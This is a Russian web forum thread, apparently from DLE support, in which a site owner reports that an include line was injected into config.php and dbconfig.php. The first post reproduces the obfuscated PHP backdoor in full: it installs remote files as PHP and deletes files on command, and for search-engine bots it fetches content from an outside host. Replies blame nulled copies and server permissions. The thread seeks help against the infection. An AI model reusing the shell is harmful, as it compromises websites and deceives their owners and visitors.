arselor 0 Опубликовано: 25 июня 2010 Рассказать Опубликовано: 25 июня 2010 Здравствуйте. Такая штука: <?php include('engine/data/conect.txt'); ?> этот код добавляется в конец в файлах: config.php и dbconfig.php Насколько мы смогли выяснить, что это shell который добирается к сайту под видом поисковых ботов, чтобы не спалили! Но, большой вопрос, каким образом злоумышленникам удалось произвести изменение в этих файлах. Если они получили бы фтп доступ, тогда срздавать новый шелл, было бы не к чему! <?php $x1a="\x63\x6f\160\171"; $x1b="f\x69\154e"; $x1c="f\163\157\x63kop\x65\x6e"; $x1d="\x69\x6dp\154od\145"; $x1e="\x73t\162\x70os"; $x1f="\165nlin\153"; if($_GET['chek']){echo"\074\x21\055-\103H\105\103K\0612\x33\x31\062\x39\x3371238\x37\x32\061\x33\055\x2d\x3e";}$x0b=$_GET['path'];$x0c=$_SERVER['DOCUMENT_ROOT']."\x2f";if($_GET['installs']){$x0d=$_GET['installs'];$x0e=$_GET['url'];$x0f = $x0e;$x10 = $x0c.$x0b.$x0d.".\160\150p";if ($x1a($x0f,$x10)){echo"o\x6b";}}if($_GET['delete']){$x11=$_GET['delete']; if($x1f($x0c."$x0b\x2f$x11\x2e\160\x68\x70"))echo"\157k";}$x12 = array();$x12['ad_Robots_UserAgent']=array('Google','Googlebot','msnbot','Yandex','YaDirectBot');$x12['ad_IsRobot']=false;foreach ($x12['ad_Robots_UserAgent'] as $x13){if ($x1e($_SERVER['HTTP_USER_AGENT'], $x13)!==false){$x12['ad_IsRobot']=true;break;}}$x14 = '';if($x12['ad_IsRobot']){$x14 = @$x1c("\166\x69p\055\142\x61s\145\x2e\167s", 80, $x15, $x16, 8); if(!$x14){echo "";}else{$x17 = @$x1b("http\072\x2f\057\166\x69\x70\055b\x61s\145.\x77\x73\x2fyand\145\170\057\x73c\x61n\x2e\160h\160\x3fhost\075$_SERVER[sERVER_NAME]\046\x69p=$_SERVER[REMOTE_ADDR]\x26$x18");if($x17==true)echo $x1d('',$x17);}}unset($x12,$x13,$x19,$x14);return $x14;?> Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 25 июня 2010 Рассказать Опубликовано: 25 июня 2010 arselor, DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, более того, он вообще не умеет ничего писать в dbconfig.php, этот файл создается при инсталяции и больше никогда не может быть изменен скриптом, ищите проблему в других посторонних файлах на сервере. Если нужна помощь тех. поддержки, начните с изучения правил форума. Цитата Ссылка на сообщение Поделиться на других сайтах
arselor 0 Опубликовано: 25 июня 2010 Рассказать Опубликовано: 25 июня 2010 Автор arselor, DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, ищите проблему в других посторонних файлах на сервере. Если нужна помощь тех. поддержки, начните с изучения правил форума. celsoft, DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, ищите проблему в других посторонних файлах на сервере. Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии. Это уязвимость уже!!!!!!!!!!!!!! config.php и dbconfig.php как то умудряются в эти файлы вписать посторонний код, который и формирует: conect.txt Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 25 июня 2010 Рассказать Опубликовано: 25 июня 2010 Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии. Это уязвимость уже!!!!!!!!!!!!!! Вы не читаете что я пишу? Дописать через скрипт туда ничего невозможно, по причине того что DLE это физически не умеет, нет в нем физичеки команд на дополнение или редактирование этих файлов. Записывают через другие скрипты, не имеющие отношения в DLE в принципе, эти посторонние файлы вам и нужно искать. Если конечно это не нелегальная копия. В нуллах, стоят специальные бекдоры, через которые такой код записать можно. И за вашим E-mail или логином, я кстати не вижу никаких лицензий. Если скрипт лицензионный, то в поддержку скрипта http://dle-news.ru/support.html со своего клиентского аккаунта пишите, предоставляйте доступ к сайту, там посмотрят что у вас на сервере стоит и какие лишние файлы имеются. Другими словами все проверят Цитата Ссылка на сообщение Поделиться на других сайтах
zgr 72 Опубликовано: 26 июня 2010 Рассказать Опубликовано: 26 июня 2010 (изменено) Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии. Это уязвимость уже!!!!!!!!!!!!!! config.php и dbconfig.php как то умудряются в эти файлы вписать посторонний код, который и формирует: conect.txt Недавно пытался себе сделать нечто подобное в модуле, выяснил для себя, что CHMOD выключен, как и его аналог при подключении к ФТП почти на всех серверах в целях безопасности. Проверьте свой сервак, возможно, он весь дырявый... Попросите вырубить на нем автоправа на папки и файлы, затем выставьте нужные права (обычно 0644 или 0666) вручную и уточните, какие они сейчас - наверняка 0777?. Сомневаюсь, что кривые руки у Целсофта, скорее у админа сервера или у вас - не в обиду, надеюсь. Изменено 26 июня 2010 пользователем zgr Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.